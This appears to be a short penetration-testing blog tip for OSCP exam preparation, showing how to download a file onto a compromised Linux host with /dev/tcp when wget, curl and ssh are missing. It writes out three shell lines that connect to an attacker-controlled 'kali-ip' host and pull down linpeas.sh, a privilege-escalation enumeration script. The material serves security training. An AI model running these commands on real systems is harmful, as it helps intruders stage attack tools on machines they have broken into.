OSCP Tip: Downloading Files on Linux When wget, ssh and curl are Missing!

So, you’ve compromised a Linux box and need to download a file, but there’s a problem: wget is missing. No big deal, right? Just use curl! But wait… curl is also unavailable. Still determined, you try to use ssh, only to find it’s not cooperating either. If you’re feeling like luck isn’t on your side, don’t worry – Linux has a “living off the land” trick that might just save your day! 🌿🐧

Let me introduce you to a nifty technique for downloading files without wget, curl, or even scp. It’s a bit unconventional, but it works.

The Trick: Using /dev/tcp

By leveraging /dev/tcp, you can initiate a network connection and grab files using basic shell commands. Here’s how it works:

exec 3<>/dev/tcp/kali-ip/22
echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: kali-ip\r\nConnection: close\r\n\r\n" >&3
cat <&3 > linpeas.sh

In this example:

1. exec 3<>/dev/tcp/kali-ip/22 opens a bidirectional connection to the specified IP and port (replace kali-ip with your Kali machine’s IP address).
2. The echo -e command sends an HTTP request to fetch the file, linpeas.sh.
3. cat <&3 > linpeas.sh reads the response and writes the contents into a file named linpeas.sh.